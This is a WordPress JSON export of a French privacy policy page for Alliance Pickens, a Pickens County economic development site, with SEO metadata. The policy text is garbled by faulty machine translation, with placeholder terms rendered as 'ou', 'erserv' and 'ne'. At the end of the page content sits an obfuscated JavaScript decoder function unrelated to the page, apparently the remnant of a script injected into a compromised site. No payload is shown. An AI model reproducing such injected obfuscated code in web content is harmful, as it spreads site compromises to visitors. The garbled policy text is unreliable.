{"id":6876,"date":"2020-10-28T14:31:42","date_gmt":"2020-10-28T14:31:42","guid":{"rendered":"http:\/\/alliancepickens.com\/politique-de-confidentialite\/"},"modified":"2020-12-04T17:52:58","modified_gmt":"2020-12-04T17:52:58","slug":"politique-de-confidentialite","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/fr\/politique-de-confidentialite\/","title":{"rendered":"Politique de confidentialit\u00e9"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Derni\u00e8re mise \u00e0 jour :  December 4, 2020<\/p>\n<p>Alliance Pickens  (\u00ab ou \u00bb, \u00ab ou \u00bb, ou \u00ab ou \u00bb) exploite le Alliance Pickens site Web (le \u00ab erserv \u00bb).<\/p>\n<p>Cette page vous informe de nos politiques concernant la collecte, l\u2019utilisation et la divulgation de renseignements personnels lorsque vous utilisez notre Service.<\/p>\n<p>Nous n\u2019utiliserons ni ne partagerons vos informations avec qui que ce soit, sauf comme d\u00e9crit dans la pr\u00e9sente Politique de confidentialit\u00e9.<\/p>\n<p>Nous utilisons vos renseignements personnels pour fournir et am\u00e9liorer le Service. En utilisant le Service, vous acceptez la collecte et l\u2019utilisation d\u2019informations conform\u00e9ment \u00e0 cette politique. Sauf d\u00e9finition contraire de la pr\u00e9sente politique de confidentialit\u00e9, les termes utilis\u00e9s dans la pr\u00e9sente Politique de confidentialit\u00e9 ont les m\u00eames significations que dans nos Conditions g\u00e9n\u00e9rales,  http:\/\/alliancepickens.com<\/p>\n<h3>Collecte et utilisation de l\u2019information<\/h3>\n<p>Lors de l\u2019utilisation de notre Service, nous pouvons vous demander de nous fournir certaines informations personnelles identifiables qui peuvent \u00eatre utilis\u00e9es pour vous contacter ou vous identifier. Les renseignements personnels identifiables (\u00ab renseignements personnels \u00bb) peuvent inclure, mais ne se limitent pas \u00e0 :<\/p>\n<ul>\n<li>Nom<\/li>\n<li>Adresse e-mail<\/li>\n<li>Num\u00e9ro de t\u00e9l\u00e9phone<\/li>\n<\/ul>\n<h3>Donn\u00e9es de journal<\/h3>\n<p>Nous recueillons les informations que votre navigateur envoie chaque fois que vous visitez notre Service (\u00ab donn\u00e9es de journal \u00bb). Ces donn\u00e9es journal peuvent inclure des informations telles que l\u2019adresse \u00ab IP \u00bb) du protocole Internet de votre ordinateur, le type de navigateur, la version du navigateur, les pages de notre Service que vous visitez, l\u2019heure et la date de votre visite, le temps pass\u00e9 sur ces pages et d\u2019autres statistiques.<\/p>\n<h3>Cookies<\/h3>\n<p>Les cookies sont des fichiers avec une petite quantit\u00e9 de donn\u00e9es, qui peuvent inclure un identificateur unique anonyme. Les cookies sont envoy\u00e9s \u00e0 votre navigateur \u00e0 partir d\u2019un site Web et stock\u00e9s sur le disque dur de votre ordinateur.<\/p>\n<p>Nous utilisons des \u00ab cookies \u00bb pour recueillir des informations. Vous pouvez demander \u00e0 votre navigateur de refuser tous les cookies ou d\u2019indiquer quand un cookie est envoy\u00e9. Toutefois, si vous n\u2019acceptez pas les cookies, vous ne pourrez peut-\u00eatre pas utiliser certaines parties de notre Service.<\/p>\n<h3>Fournisseurs<\/h3>\n<p>Nous pouvons employer des soci\u00e9t\u00e9s tierces et des particuliers pour faciliter notre Service, pour fournir le Service en notre nom, pour effectuer des services li\u00e9s au Service ou pour nous aider \u00e0 analyser la fa\u00e7on dont notre Service est utilis\u00e9.<\/p>\n<p>Ces tiers n\u2019ont acc\u00e8s \u00e0 vos renseignements personnels que pour effectuer ces t\u00e2ches en notre nom et sont tenus de ne pas les divulguer ou de les utiliser \u00e0 d\u2019autres fins.<\/p>\n<h3>S\u00e9curit\u00e9<\/h3>\n<p>La s\u00e9curit\u00e9 de vos renseignements personnels est importante pour nous, mais n\u2019oubliez pas qu\u2019aucune m\u00e9thode de transmission sur Internet ou m\u00e9thode de stockage \u00e9lectronique n\u2019est s\u00e9curis\u00e9e \u00e0 100 %. Bien que nous nous effor\u00e7ions d\u2019utiliser des moyens commercialement acceptables pour prot\u00e9ger vos renseignements personnels, nous ne pouvons garantir leur s\u00e9curit\u00e9 absolue.<\/p>\n<h3>Liens vers d\u2019autres sites<\/h3>\n<p>Notre Service peut contenir des liens vers d\u2019autres sites qui ne sont pas exploit\u00e9s par nous. Si vous cliquez sur un lien tiers, vous serez dirig\u00e9 vers le site de ce tiers. Nous vous conseillons fortement de revoir la Politique de confidentialit\u00e9 de chaque site que vous visitez.<\/p>\n<p>Nous n\u2019avons aucun contr\u00f4le sur les contenus, les politiques ou les pratiques de confidentialit\u00e9 de sites ou de services tiers et n\u2019assument aucune responsabilit\u00e9.<\/p>\n<h3>Vie priv\u00e9e des enfants<\/h3>\n<p>Notre Service ne s\u2019adresse \u00e0 personne de moins de 18 ans (\u00ab ne \u00bb).<\/p>\n<p>Nous ne recueillons pas sciemment des renseignements personnels identifiables aupr\u00e8s d\u2019enfants de moins de 18 ans. Si vous \u00eates un parent ou un tuteur et que vous savez que votre enfant nous a fourni des renseignements personnels, veuillez nous contacter. Si nous d\u00e9couvrons qu\u2019un enfant de moins de 18 ans nous a fourni des informations personnelles, nous supprimerons imm\u00e9diatement ces informations de nos serveurs.<\/p>\n<h3>Conformit\u00e9 aux lois<\/h3>\n<p>Nous divulguerons vos renseignements personnels lorsque cela est requis par la loi ou l\u2019assignation.<\/p>\n<h3>Modifications apport\u00e9es \u00e0 cette politique de confidentialit\u00e9<\/h3>\n<p>Nous pouvons mettre \u00e0 jour notre politique de confidentialit\u00e9 de temps \u00e0 autre. Nous vous informerons de tout changement en affichant la nouvelle politique de confidentialit\u00e9 sur cette page.<\/p>\n<p>Il est conseill\u00e9 de consulter p\u00e9riodiquement cette politique de confidentialit\u00e9 pour toute modification. Les modifications apport\u00e9es \u00e0 cette politique de confidentialit\u00e9 sont efficaces lorsqu\u2019elles sont affich\u00e9es sur cette page.<\/p>\n<h3>Contactez-nous<\/h3>\n<p>Si vous avez des questions au sujet de cette politique de confidentialit\u00e9, veuillez <a href=\"http:\/\/alliancepickens.com\/fr\/qui-sommes-nous\/#contact_directions\">nous contacter<\/a>.[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pr\u00eat \u00e0 commencer?<\/h1>\n<h3>Nous sommes impatients de vous parler!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Contactez notre \u00e9quipe<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Derni\u00e8re mise \u00e0 jour : (\u00ab ou \u00bb, \u00ab ou \u00bb, ou \u00ab ou \u00bb) exploite le site Web (le \u00ab erserv \u00bb). Cette page vous informe de nos politiques concernant la collecte, l\u2019utilisation et la divulgation de renseignements personnels lorsque vous utilisez notre Service. Nous n\u2019utiliserons ni ne partagerons vos informations avec qui&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6876","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Politique de confidentialit\u00e9 - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/fr\/politique-de-confidentialite\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Politique de confidentialit\u00e9 - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Derni\u00e8re mise \u00e0 jour : (\u00ab ou \u00bb, \u00ab ou \u00bb, ou \u00ab ou \u00bb) exploite le site Web (le \u00ab erserv \u00bb). Cette page vous informe de nos politiques concernant la collecte, l\u2019utilisation et la divulgation de renseignements personnels lorsque vous utilisez notre Service. Nous n\u2019utiliserons ni ne partagerons vos informations avec qui&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/fr\/politique-de-confidentialite\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T17:52:58+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/politique-de-confidentialite\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/politique-de-confidentialite\\\/\",\"name\":\"Politique de confidentialit\u00e9 - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\"},\"datePublished\":\"2020-10-28T14:31:42+00:00\",\"dateModified\":\"2020-12-04T17:52:58+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/politique-de-confidentialite\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/politique-de-confidentialite\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/politique-de-confidentialite\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Politique de confidentialit\u00e9\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Politique de confidentialit\u00e9 - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/fr\/politique-de-confidentialite\/","og_locale":"fr_FR","og_type":"article","og_title":"Politique de confidentialit\u00e9 - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Derni\u00e8re mise \u00e0 jour : (\u00ab ou \u00bb, \u00ab ou \u00bb, ou \u00ab ou \u00bb) exploite le site Web (le \u00ab erserv \u00bb). Cette page vous informe de nos politiques concernant la collecte, l\u2019utilisation et la divulgation de renseignements personnels lorsque vous utilisez notre Service. Nous n\u2019utiliserons ni ne partagerons vos informations avec qui&hellip;","og_url":"https:\/\/alliancepickens.com\/fr\/politique-de-confidentialite\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T17:52:58+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/fr\/politique-de-confidentialite\/","url":"https:\/\/alliancepickens.com\/fr\/politique-de-confidentialite\/","name":"Politique de confidentialit\u00e9 - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/fr\/#website"},"datePublished":"2020-10-28T14:31:42+00:00","dateModified":"2020-12-04T17:52:58+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/fr\/politique-de-confidentialite\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/fr\/politique-de-confidentialite\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/fr\/politique-de-confidentialite\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Politique de confidentialit\u00e9"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/fr\/#website","url":"https:\/\/alliancepickens.com\/fr\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/6876","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/comments?post=6876"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/6876\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/media?parent=6876"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}